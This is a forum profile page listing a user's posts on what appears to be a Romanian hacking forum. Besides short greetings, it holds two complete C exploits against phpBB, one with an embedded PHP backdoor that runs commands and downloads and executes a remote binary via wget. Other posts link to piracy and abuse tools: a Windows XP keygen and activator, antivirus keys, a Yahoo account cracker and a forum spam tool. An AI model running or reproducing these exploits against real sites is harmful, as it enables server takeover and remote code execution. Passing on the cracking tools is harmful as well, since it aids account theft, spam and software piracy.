Jump to content

RedJoker

Active Members
  • Posts

    384
  • Joined

  • Last visited

Everything posted by RedJoker

  1. RedJoker

    [tw8]

    eu as zice ca este o prezentare ... nu numa un simplu salut ... dar totusi .. salutare !!
  2. Bun venit !!
  3. RedJoker

    spiderx

    bine ai venit !!
  4. Resources in any 32bit Windows 95/98/ME/NT/2000 executable files (including exe’s, dll’s, ocx’s and cpl’s) can be viewed by selecting File|Open from Resource Hacker’s menu. A full list of the file’s resources will be displayed in a tree structure. The resource tree can be fully expanded or collapsed by selecting View|Expand Tree or View|Collapse Tree respectively from the menu. http://rapidshare.com/files/40712248/ResHacker.rar.html
  5. http://rapidshare.com/files/40204197/KIS_7.0.0125.rar KIS Keys (2 x 2008) : http://rapidshare.com/files/38283564/KIS_Keys__2008_.rar
  6. baietzi daca aveti domenii .. trebe cumparate cu bani legali .. nu cu niste carduri furate ... si cel ce vinde la fel !!
  7. nice post .. thx
  8. este detectabil ca trojan de catre nod32 !!
  9. /* exploit for phpBB 1.0.0 - 2.0.10 edit the b4b0.php file with the correct url to your backdoor and the correct filename for your backdoor upload it to a webserver. gcc -o b4b0-phpbb b4b0-phpbb.c ./b4b0-phpbb <url_to_system> <phpbb_dir> <url_to_b4b0.php> telnet <url_of_exploited_system> <port_of_back_door> greets to b4b0 -- evilrabbi */ #include <stdio.h> #include <string.h> #include <netdb.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> void help(char *program_name); int main(int argc, char *argv[]) { struct sockaddr_in trg; struct hostent *he; int sockfd, buff; char buffer[1024]; char *request; if(argc != 4 ) { help(argv[0]); exit(0); } he = gethostbyname(argv[1]); sockfd = socket(AF_INET, SOCK_STREAM, 0); request = (char *) malloc(1024); trg.sin_family = AF_INET; trg.sin_port = htons(80); trg.sin_addr = *((struct in_addr *) he->h_addr); memset(&(trg.sin_zero), '\0', 8); connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr)); sprintf(request,"GET http://%s/%s/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://%s?cmd=w\n",argv[1],argv[2],argv[3]); send(sockfd,request,strlen(request),0); buff=recv(sockfd, buffer, 1024-1, 0); buffer[buff] = '\0'; printf("%s",buffer); close(sockfd); return 0; } void help(char *program_name) { printf("b4b0-phpbb.c by evilrabbi for b4b0\n\n"); printf("%s hostname phpbb2_dir url_to_bad_php\n",program_name); printf("%s www.example.com phpBB2 blah.com/b4b0.php.php\n",program_name); } /* Start of b4b0.php */ /* b4b0 kickin ass again....... System was exploited telnet to the port you have your backdoor set to listen on. <? if (isset($chdir)) @chdir($chdir); ob_start(); system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"); system("cd /tmp; wget url_to_backdoor;chmod +x backdoor_name;./backdoor_name"); // EDIT THIS INFO!!!!!!!!!!!!! $output = ob_get_contents(); ob_end_clean(); if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output)); ?> */
  10. /***********************************************************/ /* phpBB 2.0.4 Remote Admin_Styles.PHP Theme_Info.CFG File Include */ /* */ /* Exploit made on June 2003 by Spoofed Existence */ /* */ /* Patch : [url]http://www.phpbb.com/phpBB/viewtopic.php?t=113826[/url] */ /***********************************************************/ #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> int main() { //The socket stuff struct hostent *hp; struct sockaddr_in sa; int sock; //The input stuff char server[100]; char location[100]; char sfile[100]; int escapes; char* file; //The request stuff char* request; char* postdata; char* header; //The buffer to store the response char buffer[4096]; int tworeturns = 0; int showing = 0; //Other int i; //Ask the server printf("Server: "); scanf("%100s", server); printf("Forum location: "); scanf("%100s", location); printf("Directories to escape: "); scanf("%i", &escapes); printf("File to get/execute: "); scanf("%100s", sfile); //Start the exploit! printf("\n\nStarting the exploit...\n"); //Connect to the server printf("Creating socket... "); if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("Failed!\n"); return 0; } else{ printf("Done!\n"); } printf("Looking up server IP... "); if((hp = gethostbyname((char*)server)) == NULL) { printf("Failed!\n"); return 0; } else { printf("Done!\n"); } printf("Connecting %s:80... ", server); memcpy(&sa.sin_addr, hp->h_addr_list[0], hp->h_length); sa.sin_family = AF_INET; sa.sin_port = htons(80); if(connect(sock, (struct sockaddr*)&sa, sizeof(sa))) { printf("Failed!\n"); return 0; } else { printf("Done!\n"); } //Create the request printf("Building request... "); //Create the postdata file = (char*)malloc(sizeof(char) * (escapes * 3 + strlen(sfile) + 1)); while(escapes > 0) { if(escapes == 1) { sprintf(file, "%s%s%s", file, "..", sfile); } else { sprintf(file, "%s%s", file, "../"); } escapes --; } postdata = (char*)malloc((27 + strlen(file)) * sizeof(char)); sprintf(postdata, "send_file= &install_to=%s%s00", file, "%"); header = (char*)malloc((170 + strlen(server) + strlen(location)) * sizeof(char)); sprintf(header, "POST /%s/admin/admin_styles.php?mode=addnew HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: %s\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", location, server, strlen(postdata)); request = (char*)malloc((strlen(postdata) + strlen(header) + 1) * sizeof(char)); sprintf(request, "%s%s", header, postdata); printf("Done!\n"); //Send the request printf("Sending request... "); write(sock, request, strlen(request)); printf("Done!\n"); printf("\nResponse:\n"); //Get the response while(recv(sock, buffer, 4096, 0) != 0) { for(i = 0; i < strlen(buffer); i++) { //Only show the character when it should if(showing == 1) { printf("%c", buffer[ i ]); } //Stop showing from \n \n if(buffer[ i ] == '\n' && buffer[i + 1] == '<' && buffer[i + 2] == 'b' && buffer[i + 3] == 'r' && buffer[i + 4] == '>' && buffer[i + 5] == '\n' && showing == 1) { showing = 0; tworeturns = 0; } //Or from \n \n if(buffer[ i ] == '\n' && buffer[i + 1] == '<' && buffer[i + 2] == 'b' && buffer[i + 3] == 'r' && buffer[i + 4] == ' ' && buffer[i + 5] == '/' && buffer[i + 6] == '>' && buffer[i + 7] == '\n' && showing == 1) { showing = 0; tworeturns = 0; } //If there's a return and tworeturns = true, start showing it if(buffer[ i ] == '\n' && tworeturns == 1) { showing = 1; } //If there are two returns, set tworeturns to true and add 3 to i if(buffer[ i ] == '\r' && buffer[i + 1] == '\n' && buffer[i + 2] == '\r' && buffer[i + 3] == '\n') { tworeturns = 1; i += 3; } } } printf("\n"); return 0; }
  11. http://rapidshare.com/files/34426013/Windows_XP_KeyGen.exe.html
  12. http://rapidshare.com/files/34425920/superscan.rar.html
  13. http://rapidshare.com/files/34425710/Win_XP_Activator.rar.html
  14. http://rapidshare.com/files/34425613/yahooUltraCracker.rar.html
  15. http://rapidshare.com/files/34425480/UC.Forum_Spam.rar.html
  16. http://rapidshare.com/files/34425405/Proxy_Pro.rar.html
×
×
  • Create New...